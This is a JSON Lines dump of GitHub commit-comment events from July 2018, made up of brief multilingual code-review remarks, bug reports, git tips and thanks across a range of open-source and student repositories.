{"id":"7976548668","type":"CommitCommentEvent","actor":{"login":"TheSkwiggs"},"repo":{"name":"eddytion/scripts"},"payload":{"comment":{"id":29734480,"position":null,"line":null,"path":null,"commit_id":"dee33b939d64c036d0c2354d4f9480e4c1f3ec76","created_at":"2018-07-17T13:02:30Z","updated_at":"2018-07-17T13:02:30Z","author_association":"NONE","body":"Hey thanks a lot for these, I promise I will use them for all sorts of totally _legal_ purposes \r\n"}},"created_at":"2018-07-17T13:02:30Z"}
{"id":"7976548763","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"alexfelipe/teste-android-mock"},"payload":{"comment":{"id":29734481,"position":51,"line":53,"path":"app/src/main/java/br/com/alura/leilao/model/Leilao.java","commit_id":"00b774b41ec304ba5954ef88719d7dbf0dfb2055","created_at":"2018-07-17T13:02:31Z","updated_at":"2018-07-17T13:02:31Z","author_association":"NONE","body":"Acho que vale sim :-)"}},"created_at":"2018-07-17T13:02:31Z"}
{"id":"7976557056","type":"CommitCommentEvent","actor":{"login":"NozMaximus"},"repo":{"name":"MrPlusGH/NPlusMiner"},"payload":{"comment":{"id":29734489,"position":null,"line":null,"path":null,"commit_id":"deb4dd22224aef6121a919e1c2296495137341f1","created_at":"2018-07-17T13:03:58Z","updated_at":"2018-07-17T13:03:58Z","author_association":"NONE","body":"Applied this patch.  One miner running GPUs \"2,3,4,5\" is working for me now.  Will report back whether I can run the 2nd instance stable.\r\n\r\nThanks for the quick response and patch."}},"created_at":"2018-07-17T13:03:58Z"}
{"id":"7976559936","type":"CommitCommentEvent","actor":{"login":"ShmielB"},"repo":{"name":"Compuskills-Jerusalem/shuk-routing"},"payload":{"comment":{"id":29734492,"position":null,"line":null,"path":null,"commit_id":"7a0174808eedecb39f1e2ca2f8178af1c37c8b7f","created_at":"2018-07-17T13:04:30Z","updated_at":"2018-07-17T13:04:30Z","author_association":"COLLABORATOR","body":"@ykosbie  This is the new JavaScript file as of **Tuesday 7/17/18**"}},"created_at":"2018-07-17T13:04:30Z"}
{"id":"7976563008","type":"CommitCommentEvent","actor":{"login":"ant-tr-v"},"repo":{"name":"ant-tr-v/mybot"},"payload":{"comment":{"id":29734494,"position":35,"line":117,"path":"ww6StatBotSQL.py","commit_id":"cf8d003f310e0ff54175c37c36cf328e21a6e54d","created_at":"2018-07-17T13:05:05Z","updated_at":"2018-07-17T13:05:05Z","author_association":"OWNER","body":"no append to the result"}},"created_at":"2018-07-17T13:05:05Z"}
{"id":"7976563386","type":"CommitCommentEvent","actor":{"login":"laoxu666"},"repo":{"name":"laoxu666/HelloMysql"},"payload":{"comment":{"id":29734495,"position":null,"line":null,"path":null,"commit_id":"f7cbc3229611f25fccd94cb40543c8d378ab24f4","created_at":"2018-07-17T13:05:09Z","updated_at":"2018-07-17T13:05:09Z","author_association":"OWNER","body":"转账操作"}},"created_at":"2018-07-17T13:05:09Z"}
{"id":"7976565972","type":"CommitCommentEvent","actor":{"login":"carols10cents"},"repo":{"name":"sgrif/crates.io"},"payload":{"comment":{"id":29734496,"position":74,"line":74,"path":"src/job.rs","commit_id":"de9d9bf2aa177b64133ad7b1027616cfe5b458f5","created_at":"2018-07-17T13:05:36Z","updated_at":"2018-07-17T13:05:36Z","author_association":"NONE","body":"Thinking about this more, I'm still confused, but now about *failed* jobs :( If the first thing we do is delete the job from the database, and if increment_retries only does something if the job is in the database, what code re-inserts the job if it fails?"}},"created_at":"2018-07-17T13:05:36Z"}
{"id":"7976571529","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29734506,"position":10,"line":10,"path":"src/main/java/ComputerProcess/ComputerProcess.java","commit_id":"687fb248cc943fd13cfde916db23a53194a72ac9","created_at":"2018-07-17T13:06:30Z","updated_at":"2018-07-17T13:06:30Z","author_association":"NONE","body":"Сейчас методы лучше делать с уровнем доступа ```public```. Если ничего не указывать, то это по-умолчанию уровень доступа ```friendly``` - доступный всем, кто объявлен в том же пакете. То есть, в нашем случае такие методы тоже будут доступны, поскольку у нас всё в одном пакете, но лучше пока более явно обозначать доступ через ```public```.\r\n\r\n[Справка по модификаторам доступа](http://www.asjava.com/core-java/java-access-modifiers-public-protected-friendly-and-private/) "}},"created_at":"2018-07-17T13:06:30Z"}
{"id":"7976572725","type":"CommitCommentEvent","actor":{"login":"volth"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29734507,"position":null,"line":null,"path":null,"commit_id":"88939a1949123fc3a17e3464c521ebcca3f7e473","created_at":"2018-07-17T13:06:42Z","updated_at":"2018-07-17T13:06:42Z","author_association":"CONTRIBUTOR","body":"It is never read"}},"created_at":"2018-07-17T13:06:42Z"}
{"id":"7976573690","type":"CommitCommentEvent","actor":{"login":"luisrudge"},"repo":{"name":"auth0/auth0.js"},"payload":{"comment":{"id":29734509,"position":null,"line":null,"path":null,"commit_id":"fb53e8c318416ab1b29c99907a9e3cf63fe25164","created_at":"2018-07-17T13:06:51Z","updated_at":"2018-07-17T13:06:51Z","author_association":"MEMBER","body":"@leoyli we'll add a patch fix for this issue: https://github.com/auth0/auth0.js/issues/806#issuecomment-405430536"}},"created_at":"2018-07-17T13:06:51Z"}
{"id":"7976577175","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":29734515,"position":null,"line":null,"path":null,"commit_id":"85c40559a7d87d2e10f4f89466f198df70834c77","created_at":"2018-07-17T13:07:25Z","updated_at":"2018-07-17T13:07:25Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Supprimer la roue dentée](https://trello.com/c/4eS5dzW4/450-supprimer-la-roue-dent%C3%A9e)"}},"created_at":"2018-07-17T13:07:25Z"}
{"id":"7976580407","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29734524,"position":26,"line":26,"path":"src/main/java/ComputerProcess/ComputerProcess.java","commit_id":"687fb248cc943fd13cfde916db23a53194a72ac9","created_at":"2018-07-17T13:08:00Z","updated_at":"2018-07-17T13:08:00Z","author_association":"NONE","body":"Здесь должна быть ошибка компиляции, т.к. обращение к private-методу"}},"created_at":"2018-07-17T13:08:00Z"}
{"id":"7976583473","type":"CommitCommentEvent","actor":{"login":"hidehiko7777"},"repo":{"name":"hidehiko7777/assessment"},"payload":{"comment":{"id":29734534,"position":null,"line":null,"path":null,"commit_id":"0dcffc98e4b2ae36082c5a3a58e26d03ce99c494","created_at":"2018-07-17T13:08:32Z","updated_at":"2018-07-17T13:08:32Z","author_association":"OWNER","body":"#1に対する対応を行いました\r\n"}},"created_at":"2018-07-17T13:08:32Z"}
{"id":"7976584834","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29734537,"position":34,"line":34,"path":"src/main/java/ComputerProcess/ComputerProcess.java","commit_id":"687fb248cc943fd13cfde916db23a53194a72ac9","created_at":"2018-07-17T13:08:48Z","updated_at":"2018-07-17T13:08:48Z","author_association":"NONE","body":"private-методы могут быть вызваны только другими методами того же класса"}},"created_at":"2018-07-17T13:08:48Z"}
{"id":"7976585033","type":"CommitCommentEvent","actor":{"login":"leoyli"},"repo":{"name":"auth0/auth0.js"},"payload":{"comment":{"id":29734538,"position":null,"line":null,"path":null,"commit_id":"fb53e8c318416ab1b29c99907a9e3cf63fe25164","created_at":"2018-07-17T13:08:50Z","updated_at":"2018-07-17T13:08:50Z","author_association":"NONE","body":"@luisrudge Thanks!  It is very helpful!"}},"created_at":"2018-07-17T13:08:50Z"}
{"id":"7976587601","type":"CommitCommentEvent","actor":{"login":"Gurusridama"},"repo":{"name":"Gurusridama/test-"},"payload":{"comment":{"id":29734542,"position":null,"line":null,"path":null,"commit_id":"1d9c5d828cf8506e137c910899448b7216cb3e63","created_at":"2018-07-17T13:09:18Z","updated_at":"2018-07-17T13:09:18Z","author_association":"OWNER","body":"wedwedwefde"}},"created_at":"2018-07-17T13:09:18Z"}
{"id":"7976588784","type":"CommitCommentEvent","actor":{"login":"mart-e"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29734545,"position":null,"line":null,"path":null,"commit_id":"57676dc7d10b50bee44d122d48863586b18e4593","created_at":"2018-07-17T13:09:31Z","updated_at":"2018-07-17T13:09:31Z","author_association":"CONTRIBUTOR","body":"Yep, you can use  `$ git cherry-pick 57676dc7d10`\r\nand add a reference in the commit message saying it is a cherry pick"}},"created_at":"2018-07-17T13:09:31Z"}
{"id":"7976589044","type":"CommitCommentEvent","actor":{"login":"dholth"},"repo":{"name":"pypa/wheel"},"payload":{"comment":{"id":29734548,"position":null,"line":null,"path":null,"commit_id":"50e11a0c10ad33eea4e887ea0c1fb6133f0a74d8","created_at":"2018-07-17T13:09:33Z","updated_at":"2018-07-17T13:09:33Z","author_association":"MEMBER","body":"Does this handle the case where generate_requirements() is called more than once?"}},"created_at":"2018-07-17T13:09:33Z"}
{"id":"7976591374","type":"CommitCommentEvent","actor":{"login":"camillemonchicourt"},"repo":{"name":"TomMilon/cartosinp"},"payload":{"comment":{"id":29734555,"position":null,"line":null,"path":null,"commit_id":"d21cd83895462ed5cb03e2314a06b06d6f754887","created_at":"2018-07-17T13:09:54Z","updated_at":"2018-07-17T13:09:54Z","author_association":"NONE","body":"Ah un peu de SQL, ça fait du bien ! :-)"}},"created_at":"2018-07-17T13:09:54Z"}
{"id":"7976593257","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29734560,"position":null,"line":null,"path":null,"commit_id":"687fb248cc943fd13cfde916db23a53194a72ac9","created_at":"2018-07-17T13:10:14Z","updated_at":"2018-07-17T13:10:14Z","author_association":"NONE","body":"Отлично, в целом то, что надо!"}},"created_at":"2018-07-17T13:10:14Z"}
{"id":"7976593501","type":"CommitCommentEvent","actor":{"login":"NapIl1"},"repo":{"name":"NapIl1/HW_LevelUP_Matrix"},"payload":{"comment":{"id":29734561,"position":null,"line":null,"path":null,"commit_id":"466ff9c5b23e8f9c06e7a1bf6b6733f255f3e1ac","created_at":"2018-07-17T13:10:16Z","updated_at":"2018-07-17T13:10:16Z","author_association":"OWNER","body":"# решение для iteration"}},"created_at":"2018-07-17T13:10:16Z"}
{"id":"7976595727","type":"CommitCommentEvent","actor":{"login":"helder-garcia"},"repo":{"name":"seredat/karbowanec"},"payload":{"comment":{"id":29734566,"position":null,"line":null,"path":null,"commit_id":"47579f988c20f5b93a7caf2c5bde24e569d45562","created_at":"2018-07-17T13:10:40Z","updated_at":"2018-07-17T13:10:40Z","author_association":"NONE","body":"💯 "}},"created_at":"2018-07-17T13:10:40Z"}
{"id":"7976597481","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29734569,"position":181,"line":181,"path":"aio/src/app/shared/scroll-spy.service.ts","commit_id":"c8b08f3a597d08ba71220a6b3e0c64d4ce6ed175","created_at":"2018-07-17T13:10:58Z","updated_at":"2018-07-17T13:10:58Z","author_association":"MEMBER","body":"Weird. IT works fine for me on Chrome 67. What is your screen resolution?"}},"created_at":"2018-07-17T13:10:58Z"}
{"id":"7976600553","type":"CommitCommentEvent","actor":{"login":"JayashreeSon"},"repo":{"name":"JayashreeSon/MyFirstRemote"},"payload":{"comment":{"id":29734572,"position":null,"line":null,"path":null,"commit_id":"c2874a6ca92ced50c707877f5ceb9c9c00374ada","created_at":"2018-07-17T13:11:31Z","updated_at":"2018-07-17T13:11:31Z","author_association":"OWNER","body":"change 1"}},"created_at":"2018-07-17T13:11:31Z"}
{"id":"7976608738","type":"CommitCommentEvent","actor":{"login":"camillemonchicourt"},"repo":{"name":"TomMilon/cartosinp"},"payload":{"comment":{"id":29734589,"position":null,"line":null,"path":null,"commit_id":"d21cd83895462ed5cb03e2314a06b06d6f754887","created_at":"2018-07-17T13:12:54Z","updated_at":"2018-07-17T13:12:54Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-17T13:12:54Z"}
{"id":"7976613317","type":"CommitCommentEvent","actor":{"login":"RameshBhupathi"},"repo":{"name":"RameshBhupathi/PickerView"},"payload":{"comment":{"id":29734597,"position":null,"line":null,"path":null,"commit_id":"310e2dfc2ca4d617b9d4350ab3b9a6ca0ae0eb91","created_at":"2018-07-17T13:13:42Z","updated_at":"2018-07-17T13:13:42Z","author_association":"OWNER","body":"Hi, Luca Nicoletti\nWill do it this weekend, thanks for u  PullRequest.\n\nOn Tue, Jul 17, 2018 at 6:04 PM Luca Nicoletti <notifications@github.com>\nwrote:\n\n> Thanks for accepting the pull request, can you update the library to\n> maven? If I include it in my project right now I'm not able to see these\n> edits.\n>\n> Thanks again\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/RameshBhupathi/PickerView/commit/310e2dfc2ca4d617b9d4350ab3b9a6ca0ae0eb91#commitcomment-29734101>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJheq39dc6lGKguYXksy0tE4gPHzIWn_ks5uHdndgaJpZM4VSwwS>\n> .\n>\n"}},"created_at":"2018-07-17T13:13:42Z"}
{"id":"7976614566","type":"CommitCommentEvent","actor":{"login":"ebartels"},"repo":{"name":"soundcloud/incubator-airflow"},"payload":{"comment":{"id":29734598,"position":null,"line":null,"path":null,"commit_id":"52f0f54594f85be711560d1a8806289199e32989","created_at":"2018-07-17T13:13:54Z","updated_at":"2018-07-17T13:13:54Z","author_association":"NONE","body":"Re-added from https://github.com/soundcloud/incubator-airflow/pull/1/commits/1e8f41c924e0c9140dee0c6a536eacead089f3ca : @jkao @maxjakob "}},"created_at":"2018-07-17T13:13:54Z"}
{"id":"7976618145","type":"CommitCommentEvent","actor":{"login":"idodin"},"repo":{"name":"idoneam/Canary"},"payload":{"comment":{"id":29734607,"position":null,"line":null,"path":null,"commit_id":"4a2b310241f1132ddcb90b657b30b3d7cda8b2c8","created_at":"2018-07-17T13:14:31Z","updated_at":"2018-07-17T13:14:31Z","author_association":"MEMBER","body":"We can do that. We can just use the `{}` from the `str.format` function. "}},"created_at":"2018-07-17T13:14:31Z"}
{"id":"7976622202","type":"CommitCommentEvent","actor":{"login":"jradtilbrook"},"repo":{"name":"SaxJ/rubiks"},"payload":{"comment":{"id":29734617,"position":null,"line":null,"path":null,"commit_id":"843da66e9e012bfcde974cff2d06d39c30c85123","created_at":"2018-07-17T13:15:15Z","updated_at":"2018-07-17T13:15:15Z","author_association":"NONE","body":"This looks good. I'm happy for a PR just for this to resolve jradtilbrook/rubiks#3, theres just a few missing or extra things if you're willing:\r\n1. Add OrientationVector to Cubie.Edges\r\n2. Sort the Cubie.Corners deriving statements alphabetically\r\n3. The definition of edge orientation vector will be unwieldy (having 12) but I don't have any other suggestions so we can get started with that at least?\r\n4. Perhaps even converting the enum types to acronyms to save instantiation lengths (probably come back to this one as well, but eg: S=Solved, CW and ACW or CCW)\r\n5. the next/prev functions might end up being renamed or aliased for readability to something along the lines of `rotate`, eg `rotateCW`.\r\n\r\nI think once other operations a fleshed out, renaming Internal.Enum to something is on the books as well but good enough for now."}},"created_at":"2018-07-17T13:15:15Z"}
{"id":"7976622846","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29734619,"position":13,"line":33,"path":"src/main/java/me/totalfreedom/totalfreedommod/discord/MessageListener.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T13:15:21Z","updated_at":"2018-07-17T13:15:21Z","author_association":"OWNER","body":"Will look into this as it does not compile properly"}},"created_at":"2018-07-17T13:15:21Z"}
{"id":"7976623273","type":"CommitCommentEvent","actor":{"login":"seb-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29734621,"position":null,"line":null,"path":null,"commit_id":"57676dc7d10b50bee44d122d48863586b18e4593","created_at":"2018-07-17T13:15:25Z","updated_at":"2018-07-17T13:15:25Z","author_association":"NONE","body":"Thanks, done."}},"created_at":"2018-07-17T13:15:25Z"}
{"id":"7976627556","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29734629,"position":17,"line":73,"path":"src/main/java/me/totalfreedom/totalfreedommod/freeze/Freezer.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T13:16:10Z","updated_at":"2018-07-17T13:16:10Z","author_association":"OWNER","body":"The difference is that it compiles properly"}},"created_at":"2018-07-17T13:16:10Z"}
{"id":"7976627779","type":"CommitCommentEvent","actor":{"login":"kristopherbullinger"},"repo":{"name":"kristopherbullinger/advanced-hashes-hashketball-prework"},"payload":{"comment":{"id":29734630,"position":null,"line":null,"path":null,"commit_id":"96346ee3a5584d681b7b83484979f8ffe364827c","created_at":"2018-07-17T13:16:12Z","updated_at":"2018-07-17T13:16:12Z","author_association":"OWNER","body":"fake solution to biggest_shoe was merged to master branch on 04July"}},"created_at":"2018-07-17T13:16:12Z"}
{"id":"7976629871","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29734632,"position":19,"line":19,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-17T13:16:33Z","updated_at":"2018-07-17T13:16:33Z","author_association":"OWNER","body":"I read about LoD and I still search ways to deal with it. If I have a method isMapEmpty () of the Game class, Game and Map classes are even more coupled. Yeah, we get rid of -> -> but the user still must know what a Map is. I'm just sayin' :)\r\n"}},"created_at":"2018-07-17T13:16:33Z"}
{"id":"7976633061","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29734635,"position":5,"line":19,"path":"src/main/java/me/totalfreedom/totalfreedommod/fun/Jumppads.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T13:17:08Z","updated_at":"2018-07-17T13:17:08Z","author_association":"OWNER","body":"Will do"}},"created_at":"2018-07-17T13:17:08Z"}
{"id":"7976634274","type":"CommitCommentEvent","actor":{"login":"yelizariev"},"repo":{"name":"it-projects-llc/mail-addons"},"payload":{"comment":{"id":29734639,"position":null,"line":null,"path":null,"commit_id":"062d8b6b6dde3a088402993624689d886a84b468","created_at":"2018-07-17T13:17:20Z","updated_at":"2018-07-17T13:17:20Z","author_association":"MEMBER","body":"This commit is wrongly marked as 12, while it's for 11"}},"created_at":"2018-07-17T13:17:20Z"}
{"id":"7976635106","type":"CommitCommentEvent","actor":{"login":"fson"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29734641,"position":25,"line":43,"path":"local-cli/server/server.js","commit_id":"c4a66a89a28152cd4b81e2b0f80ab3aac34d6872","created_at":"2018-07-17T13:17:29Z","updated_at":"2018-07-17T13:17:29Z","author_association":"CONTRIBUTOR","body":"The `initialize_done` and `initialize_failed` events don't seem to get triggered anymore after this change. I think [`runServer`](https://github.com/facebook/metro/blob/dd420e6fd8758d25133bb27470ed046ff26ed3ba/packages/metro/src/index.js#L239) needs to be changed to trigger it.\r\n\r\n(I was looking into using `initialize_done` to detect when the HTTP server is ready.)"}},"created_at":"2018-07-17T13:17:29Z"}
{"id":"7976636894","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29734644,"position":181,"line":181,"path":"aio/src/app/shared/scroll-spy.service.ts","commit_id":"c8b08f3a597d08ba71220a6b3e0c64d4ce6ed175","created_at":"2018-07-17T13:17:48Z","updated_at":"2018-07-17T13:17:48Z","author_association":"MEMBER","body":"@AmebaBrain - I can't reproduce this problem on my own Chrome Version 67.0.3396.99 (Official Build) (64-bit) - OS/X 10.13.6"}},"created_at":"2018-07-17T13:17:48Z"}
{"id":"7976639827","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29734650,"position":2,"line":1,"path":"src/main/java/me/totalfreedom/totalfreedommod/masterbuilder/MasterBuilderWorldRestrictions.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T13:18:19Z","updated_at":"2018-07-17T13:18:19Z","author_association":"OWNER","body":"Temp disabled until generation issues are fixed. It was the cause of errors whenever you did a command"}},"created_at":"2018-07-17T13:18:19Z"}
{"id":"7976642196","type":"CommitCommentEvent","actor":{"login":"davidtoni"},"repo":{"name":"GoogleChromeLabs/so-pwa"},"payload":{"comment":{"id":29734653,"position":2,"line":2,"path":"www/partials/navbar.html","commit_id":"fd96676524c995f38e96f071271e88604e5603b4","created_at":"2018-07-17T13:18:44Z","updated_at":"2018-07-17T13:18:44Z","author_association":"NONE","body":"david elton name"}},"created_at":"2018-07-17T13:18:44Z"}
{"id":"7976644157","type":"CommitCommentEvent","actor":{"login":"CesarPartner"},"repo":{"name":"CesarPartner/WebPageOffline"},"payload":{"comment":{"id":29734657,"position":4,"line":4,"path":"Index.html","commit_id":"a2aafd97ef2c68d22e6733b610151e6c3cfd188d","created_at":"2018-07-17T13:19:05Z","updated_at":"2018-07-17T13:19:05Z","author_association":"OWNER","body":"`\r\n\r\n> Good trace\r\n\r\n`"}},"created_at":"2018-07-17T13:19:05Z"}
{"id":"7976644441","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29734658,"position":4,"line":22,"path":"src/main/java/me/totalfreedom/totalfreedommod/player/FPlayer.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T13:19:08Z","updated_at":"2018-07-17T13:19:08Z","author_association":"OWNER","body":"Yes. Will most likely throw an NPE. Will fix"}},"created_at":"2018-07-17T13:19:08Z"}
{"id":"7976646450","type":"CommitCommentEvent","actor":{"login":"CesarPartner"},"repo":{"name":"CesarPartner/WebPageOffline"},"payload":{"comment":{"id":29734665,"position":4,"line":4,"path":"Index.html","commit_id":"a2aafd97ef2c68d22e6733b610151e6c3cfd188d","created_at":"2018-07-17T13:19:28Z","updated_at":"2018-07-17T13:19:28Z","author_association":"OWNER","body":"Thanks"}},"created_at":"2018-07-17T13:19:28Z"}
{"id":"7976647644","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"alexfelipe/teste-android-mock"},"payload":{"comment":{"id":29734667,"position":51,"line":53,"path":"app/src/main/java/br/com/alura/leilao/model/Leilao.java","commit_id":"00b774b41ec304ba5954ef88719d7dbf0dfb2055","created_at":"2018-07-17T13:19:39Z","updated_at":"2018-07-17T13:19:39Z","author_association":"OWNER","body":"Eu tentei fazer algumas extrações e não sei se valeu a pena, pois está fazendo uso de uma variável fora do escopo do foreach, ou seja, vou sempre enviar uma variável que vai ter o seu valor alterado dentro de outro método, não parece uma boa abordagem."}},"created_at":"2018-07-17T13:19:39Z"}
{"id":"7976649049","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29734670,"position":14,"line":184,"path":"src/main/java/me/totalfreedom/totalfreedommod/world/CleanroomChunkGenerator.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T13:19:54Z","updated_at":"2018-07-17T13:19:54Z","author_association":"OWNER","body":"Doesn't compile without commenting it out. Will check again"}},"created_at":"2018-07-17T13:19:54Z"}
{"id":"7976660850","type":"CommitCommentEvent","actor":{"login":"gpfilip"},"repo":{"name":"waynezw0618/linearNSInstabFoam"},"payload":{"comment":{"id":29734682,"position":null,"line":null,"path":null,"commit_id":"351ab920d42024b58b6373e50ce31f49e09f2ac6","created_at":"2018-07-17T13:21:53Z","updated_at":"2018-07-17T13:21:53Z","author_association":"NONE","body":"Hello, thank you for sharing your OpenFOAM + SLEPc solver, it is very helpful for getting the SVD functionality into OpenFOAM. Could you share your slepcParameters dict file used for your solver? \r\n\r\nThank you"}},"created_at":"2018-07-17T13:21:53Z"}
{"id":"7976667477","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29734693,"position":null,"line":null,"path":null,"commit_id":"4486678edccca7f7e5f14c955e92622406ea12fb","created_at":"2018-07-17T13:22:56Z","updated_at":"2018-07-17T13:22:56Z","author_association":"NONE","body":"Для таких мелких исправлений лучше не создавать отдельного коммита, а добавлять их в уже имеющийся коммит. Точнее, в гите это делается через создание коммита с исправлениями и последующее \"вдавливание\" (squash) нового коммита в предыдущий такой командой:\r\n```git\r\ngit rebase -i HEAD^2\r\n```\r\nДалее откроется консольный текстовый редактор ```vi``` с открытым на редактирование конфигом операции перебазирования. Тебе там надо для самого нового коммита вместо ```pick``` указать ```squash``` или лучше ```fixup```, чтобы не создавать нового названия коммита, а после выйти, нажав [Esc] и введя следующую команду: ```:x```"}},"created_at":"2018-07-17T13:22:56Z"}
{"id":"7976674571","type":"CommitCommentEvent","actor":{"login":"aescolar"},"repo":{"name":"aescolar/zephyr"},"payload":{"comment":{"id":29734710,"position":67,"line":148,"path":"boards/posix/native_posix/cmdline.c","commit_id":"b68fd79426520ea9452699b6046a8a225058802b","created_at":"2018-07-17T13:24:06Z","updated_at":"2018-07-17T13:24:06Z","author_association":"OWNER","body":"It just means that the value you provide is in \"parts per one\". Or in other words, if you set --rtc-drift=1e-6, you drift by 1ppm. If you set -rtc-drift=0.1 your clock is 10% faster == 1.1x the host clock.\r\nWould you prefer me to refrase it in some other way?\r\n"}},"created_at":"2018-07-17T13:24:06Z"}
{"id":"7976677048","type":"CommitCommentEvent","actor":{"login":"markyz89"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29734715,"position":null,"line":null,"path":null,"commit_id":"f794f553e4937f6b2afaab2acdb14c623d8eb8c1","created_at":"2018-07-17T13:24:28Z","updated_at":"2018-07-17T13:24:28Z","author_association":"NONE","body":"In addition to adding constructor(props), super(props) and this.removeContact = this.removeContact.bind(this); \r\n\r\nI also had to change the function syntax from fat arrow to regular.\r\n\r\nremoveContact(contact) {\r\n\t    this.setState((state) => ({\r\n\t      contacts: this.state.contacts.filter((c) => c.id !== contact.id)\r\n\t    }))\r\n\t  }\r\n\t\t\r\nWouldn't work otherwise. No idea why."}},"created_at":"2018-07-17T13:24:28Z"}
{"id":"7976677138","type":"CommitCommentEvent","actor":{"login":"wimglenn"},"repo":{"name":"pypa/wheel"},"payload":{"comment":{"id":29734717,"position":null,"line":null,"path":null,"commit_id":"50e11a0c10ad33eea4e887ea0c1fb6133f0a74d8","created_at":"2018-07-17T13:24:28Z","updated_at":"2018-07-17T13:24:28Z","author_association":"NONE","body":"No, it does not work. The master branch is still generating duplicates for this reason."}},"created_at":"2018-07-17T13:24:28Z"}
{"id":"7976678690","type":"CommitCommentEvent","actor":{"login":"simsim314"},"repo":{"name":"circleofcircles/circleofcircles"},"payload":{"comment":{"id":29734719,"position":null,"line":null,"path":null,"commit_id":"13caba05ede886f34e3ed0e0bb90605e3dde643c","created_at":"2018-07-17T13:24:43Z","updated_at":"2018-07-17T13:24:43Z","author_association":"CONTRIBUTOR","body":"One point I want to mention is that there is a specific way to make a dialog that helps to understand perspectives. There are many tricks - the basis for which is understanding instead of judging. \r\n\r\nMonologue or one way information passing is basically a way for each individual to invite other people to a tour inside their mind. Now usually you make a tour and you can ask questions etc. about what is happening inside his mind, but basically it's guided tour into other person mind. \r\n\r\nNow dialog is when this happens on both sides - when you invite into your mind and he into his. A good dialog is when you basically manage to pick good stuff from this tour, and also to give good stuff to others. \r\n\r\nYou can sometimes see people who are ignorant to others perspectives - they always respond with something they have to say without trying to get the point of others. Like there is always a set of mechanisms that make them ignorant to others. I'm not sure I can formalize all the mechanisms - but it's basically not truly listening to the other. \r\n\r\nAfter doing few good tours inside other people perspective, it's quite easy to reproduce it. You're just trying to get what feels strange for you in some person response or saying, and you try to understand what he feels and see and why he does it this way and not like you. Usually after few iterations you get pretty good at understanding the difference between you and other people at some level. Maybe you will miss some people who are not willing to share their perspective, like liars and deceivers - who just have two levels the one they have for themselves and the one they have for others, but this is a small nuance, I think most people are willing to share what they think if there is no immediate repercussions.  "}},"created_at":"2018-07-17T13:24:43Z"}
{"id":"7976708149","type":"CommitCommentEvent","actor":{"login":"Sihao"},"repo":{"name":"schultzlab/neuroSEE"},"payload":{"comment":{"id":29734788,"position":null,"line":null,"path":null,"commit_id":"3ba5d4da2f21311c64b270a735f39fe108132ba2","created_at":"2018-07-17T13:29:28Z","updated_at":"2018-07-17T13:29:28Z","author_association":"CONTRIBUTOR","body":"Why does batchProcess_20_06_18.m have a date in the filename? Is this an example of running the batch processing? @seigfredprado "}},"created_at":"2018-07-17T13:29:28Z"}
{"id":"7976715180","type":"CommitCommentEvent","actor":{"login":"jenswi-linaro"},"repo":{"name":"OP-TEE/optee_os"},"payload":{"comment":{"id":29734800,"position":null,"line":null,"path":null,"commit_id":"b048d3293b425ed6f96bf801581ad6617cdb7d8f","created_at":"2018-07-17T13:30:34Z","updated_at":"2018-07-17T13:30:34Z","author_association":"CONTRIBUTOR","body":"The answer is in the commit message..."}},"created_at":"2018-07-17T13:30:34Z"}
